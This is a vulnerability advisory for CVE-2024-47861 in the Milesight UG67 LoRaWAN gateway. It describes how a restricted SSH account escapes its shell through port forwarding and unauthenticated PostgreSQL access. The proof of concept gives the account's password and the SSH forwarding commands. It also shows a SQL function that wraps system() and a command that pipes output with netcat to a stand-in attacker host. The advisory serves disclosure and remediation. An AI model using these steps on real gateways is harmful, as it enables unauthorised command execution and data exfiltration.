Milesight UG67: Circumvention of User Account Restrictions using SSH Port Forwarding

It is possible to gain full shell access with restricted user accounts on the Milesight UG67 LoRaWAN Gateway by abusing SSH port forwarding and the PostgreSQL server.

Details

• Product: Milesight UG67 Outdoor LoRaWAN Gateway
• Affected Versions: 60.0.0.42-r5, likely others
• Fixed Versions: 60.0.0.44
• Vulnerability Type: Command Execution
• Security Risk: high
• Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
• Vendor Status: fixed version released
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-003
• Advisory Status: published
• CVE: CVE-2024-47861
• CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47861

Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments.

More Details

Attackers with SSH access to the Milesight UG67 LoRaWAN Gateway are able to circumvent the restricted menu system configured as login shell for some of the accounts.

Proof of Concept

The user account ‘pyuser’ only provides a restricted menu system as login shell:

root@(none):/# grep pyuser /overlay/upper/etc/passwd
pyuser:x:1001:1001::/home/pyuser:/usr/sbin/vtysh

$ ssh pyuser@192.168.23.150
pyuser@192.168.23.150's password: ur123456
-- model:UG67,sn:xxxxxxxxxxxx,hwver:0140 partnumber:L04EU-868M--

-------------------------------------------------------------------------
Product Model        : UG67
Firmware Version     : 60.0.0.42-r5
-------------------------------------------------------------------------

GATEWAY>
  check          Show running system information
  clear          Reset functions
  enable         Turn on privileged mode command
  exit           Exit current mode and down to previous mode
  list           Print command list
  modbus-master
  ping           Send echo messages
  quit           Exit current mode and down to previous mode
  show           Show running system information
  ssh            Open an ssh connection
  telnet         Open a telnet connection
  terminal       Set terminal line parameters
  traceroute     Trace route to destination
  ups
GATEWAY> enable
% permission denied.

However, it is possible to use all features of SSH with this restricted account, for example SOCKS5 dynamic forwards:

$ ssh -N -D 1080 pyuser@192.168.23.150
Password: ur123456

This provides a SOCKS5 proxy on TCP port 1080 of the attacker’s system, tunneling all traffic through the Milesight UG67 Outdoor LoRaWAN Gateway. This makes it possible to access services that are only listening on local interfaces and not exposed to the outside:

$ curl --proxy socks5://localhost:1080 http://127.0.0.1:17080

Similarly, local port forwards can be used to access sockets, such as that of the PostgreSQL database:

$ ssh -N -L /tmp/.s.PGSQL.5432:/tmp/.s.PGSQL.5432 pyuser@192.168.23.150
Password: ur123456

This allows to run a psql SQL client locally to access the Milesight Gateway’s database with the database account ‘postgres’ without further authentication:

$ psql -U postgres -h /tmp -d postgres
Type "help" for help.

postgres=# \l
              List of databases
     Name      |     Owner     |[...]
---------------+---------------+[...]
 loraserver_as | loraserver_as |[...]
 loraserver_ns | loraserver_ns |[...]
 postgres      | postgres      |[...]
 [...]

(5 rows)

As the account ‘postgres’ is privileged in regard to the PostgreSQL database, it is possible to create functions like the following:

postgres=# CREATE OR REPLACE FUNCTION system_command(cstring) RETURNS int
           AS '/usr/lib/plpgsql.so', 'system' LANGUAGE 'c' strict;
CREATE FUNCTION

This function provides, as the chosen name suggest, the ability to execute system commands and can be used as shown below:

postgres=# select system_command('whoami | nc attacker.example.com 1234');
 system_command
----------------
              0
(1 row)

The result could then be received on the attacker’s system, for example using netcat:

$ nc -lp 1234
postgres

Workaround

The SSH service should be disabled.

Fix

All SSH features besides tty access should be removed for restricted accounts. Unnecessary accounts should be disabled or removed.

Security Risk

Attackers with SSH access to the Milesight UG67 LoRaWAN Gateway are able to login with an undocumented password (compare rt-sa-2024-002) for the restricted user account ‘pyuser’. Using SSH port forwarding and the PostgreSQL database, the account restrictions can be circumvented in order to execute system commands. Circumvention of this shell restriction is considered to pose a high risk, due to the ability to exploit other vulnerabilities of the system.

By exploiting either of two local privilege escalation vulnerabilities (see rt-sa-2024-004 and rt-sa-2024-005) it is possible to gain root access to the Milesight UG67 LoRaWAN Gateway. It might also be possible to use the default credentials to obtain root access, if these were not changed. This requires using the busybox binary in ‘/rom/bin’, since the default login shell does not allow elevating privileges.

Timeline

• 2024-04-25 Vulnerability identified
• 2024-04-29 Customer approved disclosure to vendor
• 2024-05-14 Vendor notified
• 2024-06-28 asked Vendor for update
• 2024-07-03 Vendor will provide Update until end of July
• 2024-07-24 asked Vendor for update
• 2024-07-30 Vendor stated: Work in Progress
• 2024-08-09 Vendor stated: Fix expected Q3/24
• 2024-09-24 CVE ID requested
• 2024-09-24 asked Vendor for update
• 2024-09-24 Vendor stated: Fix in 60.0.0.44
• 2024-10-04 CVE ID assigned
• 2024-10-07 asked Vendor for update
• 2024-10-08 Vendor stated: Fix will be available mid-October
• 2024-10-18 asked Vendor for update
• 2024-10-21 Vendor stated: Fix will be available mid-November
• 2024-11-04 Vendor released fixed version for testing
• 2024-11-05 Vendor released fixed version
• 2024-12-10 Customer approved public release of vulnerabiltiy details
• 2024-12-10 Advisory released

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/